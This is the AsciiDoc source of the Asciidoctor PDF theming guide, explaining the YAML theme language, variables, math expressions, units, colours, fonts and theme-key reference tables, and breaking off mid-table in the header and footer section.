strings\n\/\/\/\/\n\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file that Asciidoctor PDF generates from AsciiDoc.\nThe theme is driven by a YAML-based configuration file.\nThis document explains how the theming system works, how to define a custom theme and how to enable the theme when running Asciidoctor PDF.\n\ntoc::[]\n\n== Language overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties.\nSelectors are the component you want to style.\nThe properties are the style elements of that component that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\nInstead of separate properties for font weight and font style, the theme language combines these as the `font_style` property (allowing values \"normal\", \"bold\", \"italic\" and \"bold_italic\").\n\nThe `text_align` property from CSS is the `align` property in the theme language.\n\nThe `color` property from CSS is the `font_color` property in the theme language.\n====\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_rhythm: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_rhythm\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme (PENDING, see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/132[#132]).\nThe converter uses the information from the theme map to help construct the PDF.\nAll the available keys are documented in <<keys>>.\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by twice the amount of indentation of the parent level.\nAlso note the placement of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a key feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* line_height (currently some exceptions)\n* text_transform (only for headings)\n* margin_bottom (falls back to $vertical_rhythm)\n\n.Heading Inheritance\n****\nHeadings are special in that they inherit starting from a specific heading level (e.g., `heading_font_size_h2`) to the heading category (e.g., `heading_font_size`) and then directly to the base value (e.g., `base_font_size`), skipping any enclosing context.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `$sidebar_title_font_color`.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your (very patriotic) brand colors:\n\n[source,yaml]\n----\nbrand:\n red: #E0162B\n white: #FFFFFF\n blue: #0052A5\n----\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: $brand_blue\n----\n\n=== Math expressions & functions\n\nThe theme language supports basic math operations to support calculated values.\nThe following table lists the supported operations and the corresponding operator for each.\n\n[%header%autowidth]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nNOTE: Like programming languages, multiple and divide take precedence over add and subtract.\n\nThe operator must always be surrounded by a space on either side.\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number up to the next integer.\nceil(...):: Rounds the number down the previous integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n=== Measurement units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nHowever, us humans like to think in real world units like inches (in), centimeters (cm) or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[%header%autowidth]\n|===\n|Unit |Suffix\n\n|Inches\n|in\n\n|Centimeter\n|cm\n\n|Millimeter\n|mm\n\n|Points\n|pt\n|===\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. left\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`.\n+\nThe special value `transparent` indicates that a color should not be used.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`).\n\nThe following are all equivalent values for the color red:\n\n[%autowidth,cols=4]\n|===\n|f00\n|#f00\n|ff0000\n|#ff0000\n|F00\n|#F00\n|FF0000\n|#FF0000\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\nIt's also possible to specify no color by assigning the special value `transparent` as shown here:\n\n[source,yaml]\n----\nbase:\n background_color: transparent\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how a RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 and 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages are currently resolved relative to the value of the `pdf-stylesdir` attribute.\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) is not supported.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle_page:\n background_image: title-cover.png\n----\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle_page:\n background_image: image:title-cover.png[]\n----\n\nLike in the AsciiDoc syntax, the inline image macro allows you to supply set the width of the image and the alignment:\n\n[source,yaml]\n----\ntitle_page:\n logo_image: image:logo.png[width=250,align=center] \n----\n\n== Fonts\n\nYou can select from <<built-in-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\n=== Built-in fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[%header%autowidth]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters that you use in your document are limited to the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\nAny characters in your AsciiDoc document that cannot be encoded will be replaced with an underscore (`_`).\n\n=== Bundled fonts\n\nAsciidoctor PDF bundles several fonts that are used in the default theme.\nYou can also use these fonts in your custom theme.\nThese fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8.\n\nThe family name of the fonts bundled with Asciidoctor PDF are as follows:\n\nhttp:\/\/www.google.com\/get\/noto\/#\/family\/noto-serif[NotoSerif]::\nA serif font that can be styled as normal, italic, bold or bold_italic.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1mn[Mplus1mn]::\nA monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.\nAlso provides the circuled numbers used in callouts.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1p[Mplus1pMultilingual]::\nA sans-serif font that provides a very complete set of Unicode glyphs.\nCannot be styled as italic, bold or bold_italic.\nUseful as a fallback font.\n\nCAUTION: At the time of this writing, you cannot use the bundled fonts if you define your own custom fonts.\nThis limitation may be lifted in the future.\n\n=== Custom fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a collection of TTF file of the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font that is not italic like a browser can._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key you gave to the font in the font catalog anywhere a `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n RobotoLight:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\n=== Fallback fonts\n\nIf one of your fonts is missing a character that is used in a document, such as special symbols, you can tell Asciidoctor PDF to retrieve the character from a fallback font.\nYou only need to specify one fallback font...typically one that has a full set of symbols.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/android.googlesource.com\/platform\/frameworks\/base\/+\/master\/data\/fonts\/[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, assign the key to the `fallbacks` key under the `font_catalog` key.\nBe sure to surround the key name in square brackets as shown below.\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks: [DroidSansFallback]\n----\n\nTIP: If you are using more than one fallback font, separate each key name by a comma.\n\nThat's it!\nNow you're covered.\nYou don't need to reference the fallback font anywhere else in your theme file to use it.\n\nCAUTION: Using a fallback font does slow down PDF generation slightly.\nIt's best to select fonts that have all the characters you need.\n\n== Keys\n\nTBW\n\n=== Page\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|page_background_color\n|<<colors,color>>\n|background_color: ffffff\n\n|page_layout\n|portrait, landscape\n|layout: portrait\n\n|page_margin\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|margin: [0.5in, 0.67in, 0.67in, 0.67in]\n\n|page_size\n|named size, <<measurement-units,measurement array [width, height]>>\n|size: Letter\n|===\n\n=== Base\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|base_font_color\n|<<colors,color>>\n|font_color: #333333\n\n|base_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|base_font_size\n|<<values,number>>\n|font_size: 10.5\n\n|base_line_height_length\n|<<values,number>>\n|line_height_length: 12\n\n|base_line_height\n|<<values,number>>\n|line_height: 1.14\n\n|base_font_size_large\n|<<values,number>>\n|font_size_large: 13\n\n|base_font_size_small\n|<<values,number>>\n|font_size_small: 9\n\n|base_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n\n|base_align\n|left, center, right, justify\n|align: justify\n\n|base_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|base_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|base_border_color\n|<<colors,color>>\n|border_color: eee\n|===\n\n=== Vertical and horizontal rhythm\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|vertical_rhythm\n|<<values,number>>\n|vertical_rhythm: 12\n\n|horizontal_rhythm\n|<<values,number>>\n|horizontal_rhythm: 12\n|===\n\n=== Link\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|link_font_color\n|<<colors,color>>\n|font_color: 428BCA\n\n|link_font_family\n|<<fonts,font family name>>\n|font_family: Roboto\n\n|link_font_size\n|<<values,number>>\n|font_size: 9\n\n|link_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n|===\n\n=== Literal inline\n\nThe literal key is used for inline monospaced text in prose and table cells.\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|literal_font_color\n|<<colors,color>>\n|font_color: B12146\n\n|literal_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|literal_font_size\n|<<values,number>>\n|font_size: 12\n\n|literal_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n|===\n\n=== Heading\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|heading_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|heading_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|heading_font_size\n|<<values,number>>\n|font_size: 9\n\n|heading_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|heading_h<n>_font_color^[1]^\n|<<colors,color>>\n|h2_font_color: [0, 99%, 100%, 0]\n\n|heading_h<n>_font_family^[1]^\n|<<fonts,font family name>>\n|h4_font_family: Roboto\n\n|heading_h<n>_font_size^[1]^\n|<<values,number>>\n|h6_font_size: round($base_font_size * 1.7)\n\n|heading_h<n>_font_style^[1]^\n|normal, italic, bold, bold_italic\n|h3_font_style: bold_italic\n\n|heading_line_height\n|<<values,number>>\n|line_height: 1.2\n\n|heading_margin_top\n|<<measurement-units,measurement>>\n|margin_top: $vertical_rhythm * 0.2\n\n|heading_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 9.600\n|===\n\n^[1]^ `<n>` may be a number ranging from 1 to 6, representing each of the six heading levels.\n\n=== Title page\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|title_page_align\n|left, center, right, justify\n|align: right\n\n|title_page_title_top\n|percentage\n|title_top: 55%\n\n|title_page_title_font_size\n|<<values,number>>\n|title_font_size: 27\n\n|title_page_title_font_color\n|<<colors,color>>\n|title_font_color: 999999\n\n|title_page_title_line_height\n|<<values,number>>\n|title_line_height: 0.9\n\n|title_page_subtitle_font_size\n|<<values,number>>\n|subtitle_font_size: 18\n\n|title_page_subtitle_font_style\n|normal, italic, bold, bold_italic\n|subtitle_font_style: bold_italic\n\n|title_page_subtitle_line_height\n|<<values,number>>\n|subtitle_line_height: 1\n\n|title_page_authors_margin_top\n|<<measurement-units,measurement>>\n|authors_margin_top: 13.125\n\n|title_page_authors_font_size\n|<<values,number>>\n|authors_font_size: $base_font_size_large\n\n|title_page_authors_font_color\n|<<colors,color>>\n|authors_font_color: 181818\n\n|title_page_revision_margin_top\n|<<measurement-units,measurement>>\n|revision_margin_top: 13.125\n|===\n\n=== Block\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|block_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [12, 15, 12, 15]\n\n|block_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 0\n\n|block_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 1\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"1a,1a,1a\", grid=none, frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* image\n|\n* listing\n* literal\n* table\n|===\n\n=== Caption\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|caption_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|caption_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|caption_font_size\n|<<values,number>>\n|font_size: 11\n\n|caption_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|caption_align\n|left, center, right, justify\n|align: left\n\n|caption_margin_inside\n|<<measurement-units,measurement>>\n|margin_inside: 3\n\n|caption_margin_outside\n|<<measurement-units,measurement>>\n|margin_outside: 0\n|===\n\n=== Code\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|code_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|code_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|code_font_size\n|<<values,number>>\n|font_size: 11\n\n|code_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|code_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: 11\n\n|code_line_height\n|<<values,number>>\n|line_height: 1.25\n\n|code_background_color\n|<<colors,color>>\n|background_color: F5F5F5\n\n|code_border_color\n|<<colors,color>>\n|border_color: CCCCCC\n\n|code_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|code_border_width\n|<<values,number>>\n|border_width: 0.75\n|===\n\n=== Blockquote\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|blockquote_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|blockquote_font_family\n|<<fonts,font family name>>\n|font_family: Notoserif\n\n|blockquote_font_size\n|<<values,number>>\n|font_size: 13\n\n|blockquote_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|blockquote_border_width\n|<<values,number>>\n|border_width: 5\n\n|blockquote_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|blockquote_cite_font_size\n|<<values,number>>\n|cite_font_size: 9\n\n|blockquote_cite_font_color\n|<<colors,color>>\n|cite_font_color: 999999\n\n|blockquote_cite_font_family\n|<<fonts,font family name>>\n|cite_font_family: Notoserif\n\n|blockquote_cite_font_style\n|normal, italic, bold, bold_italic\n|cite_font_style: bold\n\n|===\n\n=== Sidebar\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|sidebar_border_color\n|<<colors,color>>\n|border_color: FFFFFF\n\n|sidebar_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|sidebar_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|sidebar_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|sidebar_title_font_color\n|<<colors,color>>\n|title_font_color: 333333\n\n|sidebar_title_font_family\n|<<fonts,font family name>>\n|title_font_family: NotoSerif\n\n|sidebar_title_font_size\n|<<values,number>>\n|title_font_size: 13\n\n|sidebar_title_font_style\n|normal, italic, bold, bold_italic\n|title_font_style: bold\n\n|sidebar_title_align\n|left, center, right, justify\n|title_align: center\n|===\n\n=== Example\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|example_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|example_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|example_border_width\n|<<values,number>>\n|border_width: 0.75\n\n|example_background_color\n|<<colors,color>>\n|background_color: transparent\n|===\n\n=== Admonition\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|admonition_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|admonition_border_width\n|<<values,number>>\n|border_width: 0.5\n|===\n\n=== Image\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|image_align_default\n|left, center, right, justify\n|align_default: left\n|===\n\n=== Lead\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|lead_font_size\n|<<values,number>>\n|font_size: 13\n\n|lead_line_height\n|<<values,number>>\n|line_height: 1.4\n|===\n\n=== Abstract\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|abstract_font_color\n|<<colors,color>>\n|font_color: 5C6266\n\n|abstract_font_size\n|<<values,number>>\n|font_size: 13\n\n|abstract_line_height\n|<<values,number>>\n|line_height: 1.4\n\n|abstract_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n|===\n\n=== Thematic break\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|thematic_break_border_color\n|<<colors,color>>\n|border_colorL EEEEEE\n\n|thematic_break_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 6\n\n|thematic_break_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 18\n|===\n\n=== Description list\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|description_list_term_font_style\n|normal, italic, bold, bold_italic\n|term_font_style: italic\n\n|description_list_description_indent\n|<<values,number>>\n|description_indent: 15\n|===\n\n\n=== Outline list\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|outline_list_indent\n|<<measurement-units,measurement>>\n|list_indent: 40\n\n|outline_list_item_spacing\n|<<measurement-units,measurement>>\n|item_spacing: 4\n|===\n\n=== Table\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|table_background_color\n|<<colors,color>>\n|background_color: FFFFFF\n\n|table_even_row_background_color\n|<<colors,color>>\n|even_row_background_color: F9F9F9\n\n|table_foot_background_color\n|<<colors,color>>\n|foot_background_color: F0F0F0\n\n|table_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|table_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|table_cell_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|cell_padding: [3, 3, 6, 3]\n|===\n\n[[key-toc]]\n=== Table of contents\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|toc_dot_leader_content\n|double-quoted string\n|dot_leader_content: \". \"\n\n|toc_dot_leader_color\n|<<colors,color>>\n|dot_leader_color: 999999\n\n|toc_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|toc_h<n>_font_color\n|<<colors,color>>\n|h3_font_color: 999999\n\n|toc_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|toc_font_size\n|<<values,number>>\n|font_size: 9\n\n|toc_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|toc_line_height\n|number\n|line_height: 1.5\n\n|toc_indent\n|<<measurement-units,measurement>>\n|indent: 20\n\n|toc_margin_top\n|<<measurement-units,measurement>>\n|indent: 20\n|===\n\n=== Running header & footer\n\n[cols=\"3,3,5m\"]\n|===\n|Key |Value Type |Example\n\n|header_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|header_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|header_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|header_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|header_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|header_font_size\n|<<values,number>>\n|font_size: 9\n\n|header_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|header_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|header_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|header_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|header_valign\n|top, center, bottom\n|valign: center\n\n|header_<side>_content_<align>^[1]^\n|quoted string\n|right: '\\{page-number}'\n\n|footer_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|footer_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|footer_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|footer_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|footer_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|footer_font_size\n|<<values,number>>\n|font_size: 9\n\n|footer_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|footer_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|footer_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|footer_image_valign\n|top, center, bottom, 